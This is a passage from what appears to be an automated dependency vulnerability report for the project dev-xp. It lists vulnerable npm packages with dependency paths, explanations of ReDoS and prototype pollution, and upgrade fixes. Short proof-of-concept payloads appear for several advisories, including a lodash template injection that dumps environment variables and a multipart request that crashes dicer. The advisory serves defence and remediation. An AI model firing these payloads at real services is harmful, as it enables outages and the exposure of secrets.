Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-template@6.26.0 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › postcss@5.2.18 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-template@6.26.0 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › postcss@5.2.18 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › node-gyp@7.1.2 › npmlog@4.1.2 › gauge@2.7.4 › string-width@1.0.2 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to node-sass@7.0.1.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-wick@4.0.3 › node-pre-gyp@0.12.0 › npmlog@4.1.2 › gauge@2.7.4 › string-width@1.0.2 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › wick-downloader@0.3.4 › node-pre-gyp@0.14.0 › npmlog@4.1.2 › gauge@2.7.4 › string-width@1.0.2 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-helpers@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-core@6.26.3 › babel-helpers@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › @npmcli/run-script@1.8.6 › node-gyp@7.1.2 › npmlog@4.1.2 › gauge@2.7.4 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to rollup-plugin-filesize@10.0.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › has-ansi@2.0.0 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0 › babel-code-frame@6.26.0 › chalk@1.1.3 › strip-ansi@3.0.1 › ansi-regex@2.1.1
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › @npmcli/run-script@1.8.6 › node-gyp@7.1.2 › npmlog@4.1.2 › gauge@2.7.4 › string-width@1.0.2 › strip-ansi@3.0.1 › ansi-regex@2.1.1Remediation: Upgrade to rollup-plugin-filesize@10.0.0.
…and 32 more
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the sub-patterns [[\\]()#;?]*
and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*
.
PoC
import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = "\u001B["+";".repeat(i*10000);
ansiRegex().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade ansi-regex
to version 3.0.1, 4.1.1, 5.0.1, 6.0.1 or higher.
References
high severity
- Vulnerable module: dicer
- Introduced through: firebase-admin@9.12.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › dicer@0.3.1
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.
PoC
await fetch('http://127.0.0.1:8000', { method: 'POST', headers: { ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro', ['content-length']: '145', connection: 'keep-alive', }, body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--' });
Remediation
There is no fixed version for dicer
.
References
high severity
- Vulnerable module: loader-utils
- Introduced through: rollup-plugin-vue@4.7.2
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › generic-names@1.0.3 › loader-utils@0.2.17
Overview
Affected versions of this package are vulnerable to Prototype Pollution in parseQuery
function via the name variable in parseQuery.js
. This pollutes the prototype of the object returned by parseQuery
and not the global Object prototype (which is the commonly understood definition of Prototype Pollution). Therefore, the actual impact will depend on how applications utilize the returned object and how they filter unwanted keys.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade loader-utils
to version 1.4.1, 2.0.3 or higher.
References
high severity
- Vulnerable module: trim-newlines
- Introduced through: node-sass@5.0.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › meow@3.7.0 › trim-newlines@1.0.0Remediation: Upgrade to node-sass@6.0.1.
Overview
trim-newlines is a Trim newlines from the start and/or end of a string
Affected versions of this package are vulnerable to Denial of Service (DoS) via the end()
method.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
ws
package
Remediation
Upgrade trim-newlines
to version 3.0.1, 4.0.1 or higher.
References
high severity
- Vulnerable module: lodash-es
- Introduced through: rete-context-menu-plugin@0.6.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rete-context-menu-plugin@0.6.0 › lodash-es@4.17.15Remediation: Upgrade to rete-context-menu-plugin@2.0.0.
Overview
Affected versions of this package are vulnerable to Prototype Pollution via the set
and setwith
functions due to improper user input sanitization.
PoC
lod = require('lodash')
lod.set({}, "__proto__[test2]", "456")
console.log(Object.prototype)
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade lodash-es
to version 4.17.20 or higher.
References
high severity
- Vulnerable module: node-forge
- Introduced through: firebase-admin@9.12.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › node-forge@0.10.0Remediation: Upgrade to firebase-admin@10.0.2.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to RSA's PKCS#1
v1.5 signature verification code which does not check for tailing garbage bytes after decoding a DigestInfo
ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used.
Remediation
Upgrade node-forge
to version 1.3.0 or higher.
References
high severity
- Vulnerable module: lodash-es
- Introduced through: rete-context-menu-plugin@0.6.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rete-context-menu-plugin@0.6.0 › lodash-es@4.17.15Remediation: Upgrade to rete-context-menu-plugin@2.0.0.
Overview
Affected versions of this package are vulnerable to Code Injection via template
.
PoC
var _ = require('lodash');
_.template('', { variable: '){console.log(process.env)}; with(obj' })()
Remediation
Upgrade lodash-es
to version 4.17.21 or higher.
References
high severity
- Vulnerable module: axios
- Introduced through: axios@0.21.4
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › axios@0.21.4Remediation: Upgrade to axios@0.28.0.
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to inserting the X-XSRF-TOKEN
header using the secret XSRF-TOKEN
cookie value in all requests to any server when the XSRF-TOKEN
0 cookie is available, and the withCredentials
setting is turned on. If a malicious user manages to obtain this value, it can potentially lead to the XSRF defence mechanism bypass.
Workaround
Users should change the default XSRF-TOKEN
cookie name in the Axios configuration and manually include the corresponding header only in the specific places where it's necessary.
Remediation
Upgrade axios
to version 0.28.0, 1.6.0 or higher.
References
medium severity
- Vulnerable module: @grpc/grpc-js
- Introduced through: firebase-admin@9.12.0 and firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › @google-cloud/firestore@4.15.1 › google-gax@2.30.5 › @grpc/grpc-js@1.6.12Remediation: Upgrade to firebase-admin@11.1.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › @google-cloud/pubsub@2.19.4 › google-gax@2.30.3 › @grpc/grpc-js@1.6.12Remediation: Upgrade to firebase-tools@11.1.0.
Overview
@grpc/grpc-js is a gRPC Library for Node
Affected versions of this package are vulnerable to Uncontrolled Resource Consumption via the grpc.max_receive_message_length
channel option. An attacker can cause a denial of service by sending messages that exceed the configured limits, which are then buffered or decompressed into memory.
Remediation
Upgrade @grpc/grpc-js
to version 1.8.22, 1.9.15, 1.10.9 or higher.
References
medium severity
- Vulnerable module: find-my-way
- Introduced through: restify@8.6.1
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › restify@8.6.1 › find-my-way@2.2.5
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when including two parameters ending with -
in a single segment, which causes inefficient backtracking when parsing the string into a regular expression. The resulting poor performance can lead to denial of service.
Note:
This vulnerability is similar to the path-to-regexp ReDoS Vulnerability
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade find-my-way
to version 8.2.2, 9.0.1 or higher.
References
medium severity
- Vulnerable module: path-to-regexp
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › superstatic@7.1.0 › router@1.3.8 › path-to-regexp@0.1.7Remediation: Upgrade to firebase-tools@11.14.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when including multiple regular expression parameters in a single segment, which will produce the regular expression /^\/([^\/]+?)-([^\/]+?)\/?$/
, if two parameters within a single segment are separated by a character other than a /
or .
. Poor performance will block the event loop and can lead to a DoS.
Note:
While the 8.0.0 release has completely eliminated the vulnerable functionality, prior versions that have received the patch to mitigate backtracking may still be vulnerable if custom regular expressions are used. So it is strongly recommended for regular expression input to be controlled to avoid malicious performance degradation in those versions. This behavior is enforced as of version 7.1.0 via the strict
option, which returns an error if a dangerous regular expression is detected.
Workaround
This vulnerability can be avoided by using a custom regular expression for parameters after the first in a segment, which excludes -
and /
.
PoC
/a${'-a'.repeat(8_000)}/a
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade path-to-regexp
to version 0.1.10, 1.9.0, 3.3.0, 6.3.0, 8.0.0 or higher.
References
medium severity
- Vulnerable module: path-to-regexp
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › superstatic@7.1.0 › router@1.3.8 › path-to-regexp@0.1.7Remediation: Upgrade to firebase-tools@11.14.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when including multiple regular expression parameters in a single segment, when the separator is not .
(e.g. no /:a-:b
). Poor performance will block the event loop and can lead to a DoS.
Note:
This issue is caused due to an incomplete fix for CVE-2024-45296.
Workarounds
This can be mitigated by avoiding using two parameters within a single path segment, when the separator is not .
(e.g. no /:a-:b
). Alternatively, the regex used for both parameters can be defined to ensure they do not overlap to allow backtracking.
PoC
/a${'-a'.repeat(8_000)}/a
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
